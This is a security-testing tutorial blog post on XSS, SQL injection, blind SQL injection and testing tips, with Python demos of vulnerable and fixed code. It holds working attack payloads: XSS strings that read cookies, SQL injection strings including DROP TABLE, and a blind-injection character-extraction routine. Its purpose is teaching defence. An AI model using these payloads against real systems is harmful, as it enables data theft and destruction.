Security testing – revisited

This post (security testing revisited) summarizes a few of my earlier posts related to security testing:

  1. Ethical Hacking – part 1 – 

    Before going into the details of how to do ethical hacking we should be clear about what it is. What is ethical hacking? ….

  2. Ethical Hacking – part 2

    In this part we will go a step further in to ethical hacking and discuss how to do Penetration testing. Warning: Proceed only after permission from network owner else it will be treated as hacking….

  3. What is Cross-Site Scripting?

    What is Cross-Site Scripting (XSS)? Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise trusted web sites….

  4. SQL Injection

    SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed SQL command to the database. ….

  5. Security Testing tips

    What is Security testing? Security testing is a process to determine that an information system protects data and maintains functionality as intended. It is the process that determines that confidential data stays confidential and users can perform only those tasks that they are authorized to perform….

     

What is Cross-Site Scripting?

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
XSS attacks generally fall into two categories (a third, DOM-based XSS, in which the injection happens entirely inside client-side script, is not covered here):
  • Stored XSS Attacks –

Injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log or comment field. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS.

This vulnerability can be used to conduct a number of browser-based attacks including:

  1. Hijacking another user’s browser
  2. Capturing sensitive information viewed by application users
  3. Pseudo defacement of the application
  4. Port scanning of internal hosts (“internal” in relation to the users of the web application)
  5. Directed delivery of browser-based exploits
  6. Other malicious activities

Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs simply when a user visits a page that contains the stored XSS.

  • Reflected XSS Attacks –

Injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a “trusted” server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS.

Testing for XSS Vulnerability

XSS flaws can be difficult to identify and remove from a web application. The best way to find them is to perform a security review of the code and search for every place where input from an HTTP request could make its way into the HTML output. Every such data entry point is a potential XSS sink.
Enter the following payload into a text field or URL parameter:
 <IMG SRC=javascript:alert('XSS')>

If the application does not escape its output, the page renders the tag and a browser pop-up containing "XSS" appears. Note that current browsers no longer execute javascript: URLs in an image src, so this classic payload mainly tells you whether the tag survives unescaped; the event-handler variants below are not subject to that restriction:

<body onload=alert('test1')> 
<b onmouseover=alert('Wufff!')>click me!</b> 
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
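As an added example (not code from the original post), the following Python sketch shows the two renderers a code review is hunting for: one that concatenates the request parameter straight into HTML, and one that escapes it, plus a small audit that runs the payloads listed above through each. It also covers the URL-attribute case that escaping alone does not fix. The greeting markup, the function names and the test inputs are assumptions made for the illustration; the payloads are the ones listed above.

```python
import html
from urllib.parse import urlparse

# Constructed test inputs: the four payloads listed in the post.
XSS_PAYLOADS = [
    "<IMG SRC=javascript:alert('XSS')>",
    "<body onload=alert('test1')>",
    "<b onmouseover=alert('Wufff!')>click me!</b>",
    '<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>',
]


def render_greeting_vulnerable(first_name):
    """Hypothetical 'Welcome' page: the request parameter is concatenated
    straight into the HTML, which is exactly the sink a code review looks for."""
    return "<p>Welcome, " + first_name + "</p>"


def render_greeting_safe(first_name):
    """Same page with the input escaped for an HTML text node.
    html.escape turns < > & " ' into entities, so the browser shows the
    payload as text instead of parsing it as markup."""
    return "<p>Welcome, " + html.escape(first_name, quote=True) + "</p>"


def safe_href(url):
    """Escaping is not enough for URL attributes: javascript:alert('XSS')
    contains no HTML special characters at all. Allow only http(s) schemes
    (relative links are rejected too, to keep the rule simple), then escape."""
    if urlparse(url.strip()).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def reflects_unescaped(render, payload):
    """The manual test from the post, automated: does the payload's markup
    come back in the response unchanged (the way <h1>Rakesh</h1> would
    render as a heading)?"""
    return payload in render(payload)


def audit(render):
    """Returns the payloads that a renderer reflects without escaping;
    an empty list means every payload was neutralised."""
    return [p for p in XSS_PAYLOADS if reflects_unescaped(render, p)]


if __name__ == "__main__":
    print("vulnerable renderer reflects", len(audit(render_greeting_vulnerable)), "payloads")
    print("safe renderer reflects", len(audit(render_greeting_safe)), "payloads")
    print(render_greeting_safe("<h1>Rakesh</h1>"))
```

The audit deliberately checks for the payload text surviving verbatim rather than for a pop-up: that is what a tester can observe in a proxy like Burp Suite without a browser, and it is the same signal whether the sink is a stored comment field or a reflected search parameter. html.escape is correct only for text nodes and quoted attribute values; output that lands inside a script block, a URL or a CSS value needs the encoding for that context.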

Tools for testing XSS vulnerability

  • Burp Suite
  • XSS-Me

We will cover the details of the tools in future posts.

 

What is the difference between vulnerability and exploit?

A vulnerability is a flaw in a system, or in some software on that system, that could provide an attacker with a way to bypass the security controls of the host operating system or of the software itself. It isn’t an open door but rather a weakness which, if attacked, could provide a way in.

Exploiting is the act of turning a vulnerability (a weakness) into an actual way to breach a system. A vulnerability can therefore be ‘exploited’ to turn it into a viable method of attacking the system; the code or procedure that does so is the exploit.

In software, the most common type of vulnerability is a memory error: buffer overflows, heap corruption or NULL pointer dereferences. Once a memory issue has been discovered an attacker tries to exploit it by controlling how the memory is corrupted, in the hope of altering some control data (for example a return address). This can then be used to make the CPU run code from another part of memory. If arbitrary code execution is achieved, the system is compromised; how far the compromise reaches depends on the nature of the vulnerability and the privileges of the affected process.

SQL Injection

SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed SQL command to the database. SQL injection is a code injection technique that exploits a security vulnerability in an application’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.

As per Wikipedia, the different classes of SQL Injection attack (SQLIA) are as follows:

  • Classic SQLIA
  • Inference (blind) SQL injection
  • Interacting with SQL injection
  • Database management system-specific SQLIA
  • Compounded SQLIA
      • SQL injection + insufficient authentication
      • SQL injection + DDoS attacks
      • SQL injection + DNS hijacking
      • SQL injection + XSS

SQL Injection types are as follows:

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. The result is that the end user of the application can manipulate the statements executed against the database.

Following example explains this vulnerability:

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

This SQL code gets the details of the specified user from the users table. A hacker or malicious user can modify the userName variable to execute unintended SQL. For example, setting the userName variable to

' or '1'='1

or

' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '

On using the first two of the above in the userName field, the following SQL queries are rendered:

SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name = '' OR '1'='1' -- ';

Because '1'='1' is always true, the WHERE clause matches every row, so the query returns all users instead of the one that was asked for; the trailing --, ({ or /* variants comment out whatever the application appends after the injected value.

Consider another example:

The following value in the userName field will delete the users table and then select data for all users from another table:

a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't

This code translates to

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

This only works where the database API accepts several statements in one call (stacked queries). Many drivers, including PHP’s mysql_query and Python’s sqlite3 execute(), refuse more than one statement per call, in which case the injection is limited to altering the single query; that is a mitigation, not a fix.

 

Incorrect type handling 

This form of SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric.

e.g. statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"

It is clear from this statement that the author intended a_variable to be a number correlating to the “id” field. However, if it is in fact a string then the end-user may manipulate the statement as they choose, thereby bypassing the need for escape characters. For example, setting a_variable to

1;DROP TABLE users

will drop (delete) the “users” table from the database, since the SQL would be rendered as follows:

SELECT * FROM userinfo WHERE id=1;DROP TABLE users;
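As an added example covering both the escape-character case above and the type-handling case, the following Python code (not from the original post) builds a small in-memory SQLite database and runs the post’s payloads through a concatenated query and a parameterized one. The table contents, the function names and the use of SQLite are assumptions made for the illustration; SQLite happens to refuse stacked statements, which the last function uses to show the caveat rather than to drop the table.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the post): a users table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn, user_name):
    """The post's pattern: the input is concatenated into the SQL text,
    so a quote in it ends the string literal and the rest becomes SQL."""
    statement = "SELECT name FROM users WHERE name = '" + user_name + "'"
    return [row[0] for row in conn.execute(statement)]


def find_user_safe(conn, user_name):
    """Parameter binding: the value travels separately from the query text,
    so a quote or a comment marker in it is just data."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE name = ?", (user_name,))]


def find_by_id_vulnerable(conn, a_variable):
    """Incorrect type handling: the numeric field is concatenated without
    quotes, so no escape character is needed to inject ("1 OR 1=1")."""
    statement = "SELECT name FROM users WHERE id = " + a_variable
    return [row[0] for row in conn.execute(statement)]


def find_by_id_safe(conn, a_variable):
    """Enforce the type first (int() raises ValueError for "1 OR 1=1"), then bind."""
    user_id = int(a_variable)
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE id = ?", (user_id,))]


def try_stacked_query(conn):
    """Sends the post's DROP TABLE payload through the vulnerable lookup and
    returns how many rows the users table has afterwards. Python's sqlite3
    refuses to run more than one statement per execute() call, so here the
    call raises and nothing is dropped; on a driver and database that allow
    stacked queries all three statements would run."""
    payload = "a';DROP TABLE users; SELECT * FROM users WHERE 't' = 't"
    try:
        find_user_vulnerable(conn, payload)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        pass
    return conn.execute("SELECT count(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, "' or '1'='1"))   # every user
    print(find_user_safe(db, "' or '1'='1"))         # []
    print(find_by_id_vulnerable(db, "1 OR 1=1"))     # every user
    print(try_stacked_query(db))                     # 3: the table survived
```

The parameterized versions are the actual fix: with a bound parameter the database never sees the input as part of the query grammar, so no escaping rules have to be remembered and no character list has to be maintained. Type enforcement (int()) is worth keeping in front of the binding anyway, because it rejects junk early and gives a cleaner error than the database would.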

 

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to SQL injection but the results of the injected query are not visible to the attacker. The vulnerable page may not display data at all, but it renders differently depending on the truth of a logical condition injected into the legitimate SQL statement behind that page.

One type of blind SQL injection forces the database to evaluate a logical statement and reads the answer from an ordinary application screen.

For example, if a website uses a query string parameter to decide which user's data to display, such as

http://users.test.com/showuserdetails.aspx?ID=1001

the server may run the following query:

SELECT * FROM users WHERE ID = '1001';

A hacker can then load the following two URLs (the extra quote closes the string literal that the page wraps around the ID; the quote and spaces are URL-encoded when sent):

http://users.test.com/showuserdetails.aspx?ID=1001' AND '1'='1
http://users.test.com/showuserdetails.aspx?ID=1001' AND '1'='2

These result in the following queries:

SELECT * FROM users WHERE ID = '1001' AND '1'='1';
SELECT * FROM users WHERE ID = '1001' AND '1'='2';

If the first URL shows the user's details and the second shows an empty or error page, the injected condition is being evaluated by the database. A hacker can then replace '1'='2' with conditions about other data (the first character of an administrator's password, the length of a table name) and read the answer one true/false at a time.
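As an added example (not from the original post), the following Python code simulates the showuserdetails page against an in-memory SQLite table and then does what the last paragraph describes: it confirms the injection with the 1=1 / 1=2 pair and recovers a hidden column one character at a time using only the page’s yes/no behaviour. The table layout, the secret column, the character set and the function names are assumptions made for the illustration.

```python
import sqlite3
import string


def make_db():
    """Constructed stand-in for the users table behind showuserdetails.aspx."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (ID INTEGER, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES (1001, 'alice', 's3cr3t')")
    conn.commit()
    return conn


def page_shows_user(conn, id_param):
    """Simulates the vulnerable page: the ID parameter is concatenated into the
    query. Returns True when a row is found (the page renders the user) and
    False otherwise (the page renders empty). The attacker gets only this bit."""
    query = "SELECT name FROM users WHERE ID = '" + id_param + "'"
    return conn.execute(query).fetchone() is not None


def confirm_injectable(oracle):
    """The post's test: a true condition keeps the page, a false one blanks it."""
    return oracle("1001' AND '1'='1") and not oracle("1001' AND '1'='2")


def extract_secret(oracle, charset=string.ascii_lowercase + string.digits, max_len=32):
    """Boolean-based blind extraction: one yes/no request per character guess.
    SUBSTR is 1-indexed in SQLite; past the end it returns '' and nothing matches,
    which is how the loop detects the end of the string."""
    recovered = ""
    for position in range(1, max_len + 1):
        for ch in charset:
            probe = ("1001' AND SUBSTR((SELECT secret FROM users WHERE ID = 1001), %d, 1) = '%s"
                     % (position, ch))
            if oracle(probe):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    oracle = lambda id_param: page_shows_user(db, id_param)
    print("injectable:", confirm_injectable(oracle))
    print("recovered secret:", extract_secret(oracle))
```

Each probe asks the database one question whose answer the page leaks as "user shown" or "user not shown". With a 36-character alphabet that is up to 36 requests per character; real tools cut this to about 7 per character by binary-searching on the character code (ASCII/UNICODE) instead of testing each value, and fall back to timing (time-based blind) when the page looks identical in both cases.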

 

Manual SQL Injection testing checklist

  1. Test the size and data type of input and make sure appropriate limits are enforced. This can help prevent deliberate buffer overruns.
  2. Test the content of string variables and make sure only expected values are accepted. Binary data, escape sequences, and comment characters should be rejected. This can help prevent script injection and can protect against some buffer overrun exploits.
  3. When testing XML documents, validate all data against its schema as it is entered.
  4. Test that Transact-SQL statements are never built directly from user input; parameterized queries or stored procedures with typed parameters should be used instead.
  5. Make sure the following input characters are rejected wherever possible:

Input character   Meaning in Transact-SQL
;                 Query delimiter.
'                 Character data string delimiter.
--                Comment delimiter.
/* ... */         Comment delimiters. Text between /* and */ is not evaluated by the server.
xp_               Used at the start of the name of catalog-extended stored procedures, such as xp_cmdshell.

Rejecting characters is a blocklist and only a secondary defence: legitimate input (a surname such as O'Brien) contains some of them, and alternative encodings or database-specific syntax can get around the list. Item 4, keeping user input out of the query text altogether, is the control that actually closes the hole.

 

 

Security testing tips

This post continues my earlier post on security testing. Before I move into the details of security testing, here are a few tips for beginners and some browser add-ons that can help with security testing.

 

Security testing tips:-

  • Directory listing enabled or disabled – Browse to a directory rather than a file, for example http://example.com/images/. If the server responds with a list of the files in that directory, directory listing is enabled; if it gives a message like “Directory listing denied”, a 403, or an empty page even though there are files in it, it is disabled. An enabled listing exposes file names (backups, configuration files, old versions) that were never meant to be linked, so it is a potential problem.
  • HTML tag execution – Check this on any text field. Example: type <h1>Rakesh</h1> in the First Name text field and save the page. If my name then appears in <h1> font size in the “Welcome, Rakesh” text, the application is writing user input into HTML without escaping it, which is a security vulnerability: a <script> tag or an event-handler attribute would be executed just the same, resulting in an XSS (Cross-site scripting) attack.
  • Bypassing the mandatory fields – You can use the Firebug add-on for Firefox for this technique (Firebug has since been discontinued; the Inspect Element feature of the developer tools built into Firefox and Chrome works the same way).
    1. Install the Firebug add-on
    2. Press F12 (Windows) to invoke Firebug
    3. Use the Inspect Element feature to highlight the mandatory field
    4. The code for that UI element gets highlighted
    5. Delete the code for the mandatory field (or remove its required attribute)
    6. Submit the form

If the form gets submitted, the “mandatory” rule exists only in the browser and there is no validation on the server or database side. If the server rejects it with an error message, validation is done on both ends. Client-side validation can always be bypassed this way (or by sending the request directly from a proxy such as Burp Suite), so it is a usability aid, not a security control.

  • Token generation – When you initiate Forgot Password you receive an e-mail with a token. The token must not be the same every time; it should be randomly generated on each request, and long enough that it cannot be guessed or brute-forced. It should expire once used, and there should also be a maximum number of hours after which it expires even if it is never used. This applies equally to registration tokens and any other module where tokens are used.
  • Robots.txt – A website uses robots.txt to ask bots not to index specific pages. Since the file is publicly readable, it sometimes reveals the URL of the admin page or of other pages the owner considered confidential.
  • Account lockout policy – This is important for any login function. Different products have different account lockout policies; a bank account might allow 3 attempts. Most products do not have this policy, but in my opinion it is required for any login function: Forgot Password lets a genuine user recover access if they forget their password, so there is no reason not to lock out an account after repeated failures and deny attackers a brute-force attack. Bear in mind that an attacker can abuse a hard lockout to lock legitimate users out, so a temporary lockout or a progressive delay is usually preferable to a permanent one.
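The token and lockout tips above, as an added Python example that is not part of the original post: a Forgot Password token store that issues random, long, single-use, expiring tokens, and a login guard that locks an account temporarily after repeated failures. The one-hour lifetime, the five-attempt limit, the fifteen-minute lockout, the class and function names and the password-check callback are all assumptions chosen for the illustration.

```python
import hashlib
import secrets
import time

TOKEN_BYTES = 32             # 256 bits of randomness: far beyond brute-force range
TOKEN_TTL_SECONDS = 60 * 60  # assumed policy: unused tokens die after one hour
MAX_ATTEMPTS = 5             # assumed policy: lock after five consecutive failures
LOCKOUT_SECONDS = 15 * 60    # temporary, so an attacker cannot lock users out for good


class ResetTokenStore:
    """Issues and redeems Forgot Password tokens that are random, long,
    single-use and time-limited. Only a SHA-256 hash of each token is stored,
    so a leaked table does not hand an attacker tokens that can be redeemed."""

    def __init__(self, ttl=TOKEN_TTL_SECONDS):
        self._ttl = ttl
        self._tokens = {}  # sha256(token) -> (username, expires_at)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue(self, username, now=None):
        """Returns a fresh token. secrets (not random) is backed by the OS CSPRNG."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(TOKEN_BYTES)
        self._tokens[self._digest(token)] = (username, now + self._ttl)
        return token

    def redeem(self, token, now=None):
        """Returns the username if the token is known, unused and unexpired,
        otherwise None. pop() removes it, which is what makes it single-use."""
        now = time.time() if now is None else now
        entry = self._tokens.pop(self._digest(token), None)
        if entry is None:
            return None
        username, expires_at = entry
        return username if now <= expires_at else None


class LoginGuard:
    """Account lockout: after MAX_ATTEMPTS consecutive failures the account
    rejects every attempt, even with the right password, for LOCKOUT_SECONDS."""

    def __init__(self, check_password):
        self._check_password = check_password  # callable(username, password) -> bool
        self._state = {}  # username -> (failure_count, locked_until)

    def attempt(self, username, password, now=None):
        now = time.time() if now is None else now
        failures, locked_until = self._state.get(username, (0, 0.0))
        if now < locked_until:
            return "locked"
        if self._check_password(username, password):
            self._state.pop(username, None)  # success resets the counter
            return "ok"
        failures += 1
        if failures >= MAX_ATTEMPTS:
            self._state[username] = (0, now + LOCKOUT_SECONDS)
            return "locked"
        self._state[username] = (failures, 0.0)
        return "bad-password"


if __name__ == "__main__":
    store = ResetTokenStore()
    token = store.issue("alice")
    print(token, store.redeem(token), store.redeem(token))  # second redeem is None
    guard = LoginGuard(lambda user, pw: pw == "hunter2")
    print([guard.attempt("alice", "wrong") for _ in range(MAX_ATTEMPTS)])
```

When testing a real application against these requirements, request two reset tokens for the same account and compare them, try a used token a second time, and try one after the stated lifetime; for lockout, count how many wrong passwords are accepted before the correct one is refused, and check that the lock is per account rather than per session or per IP address, since the attacker controls both of those.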

 

Some of the Firefox add-ons are depicted in the following mind map (image: “Security testing Firefox addon”).

Security Testing – What is Security testing?

What is Security testing?

Security testing is a process to determine that an information system protects data and maintains functionality as intended. It is the process that determines that confidential data stays confidential and users can perform only those tasks that they are authorized to perform. Security testing covers confidentiality, integrity, authentication, availability, authorization and non-repudiation.

Confidentiality – A security measure which protects against the disclosure of information to parties other than the intended recipient. Keeping data secret is necessary, but it is by no means the only aspect of security.

Integrity – A measure intended to allow the receiver to determine that the information it receives is correct and has not been altered. Integrity schemes often use some of the same underlying technologies as confidentiality schemes, but they usually involve adding extra information to a communication (a checksum, MAC or signature) to form the basis of an algorithmic check, rather than encoding the whole communication.

Authentication-This might involve confirming the identity of a person, tracing the origins of an artifact, ensuring that a product is what its packaging and labeling claims to be, or assuring that a computer program is a trusted one.

Authorization- The process of determining that a requester is allowed to receive a service or perform an operation. Access control is an example of authorization…….

Availability-Assuring information and communications services will be ready for use when expected. Information must be kept available to authorized persons when they need it.

Non-repudiation- In reference to digital security, nonrepudiation means to ensure that a transferred message has been sent and received by the parties claiming to have sent and received the message. Nonrepudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message.

Given enough time and resources, good security testing will ultimately penetrate a system.

There are some questions that need to be answered before diving deep into security testing. These are as follows:

What is “Vulnerability”?

What is “URL manipulation”?

What is “SQL injection”?

What is “XSS (Cross Site Scripting)”?

What is “Spoofing”?

 
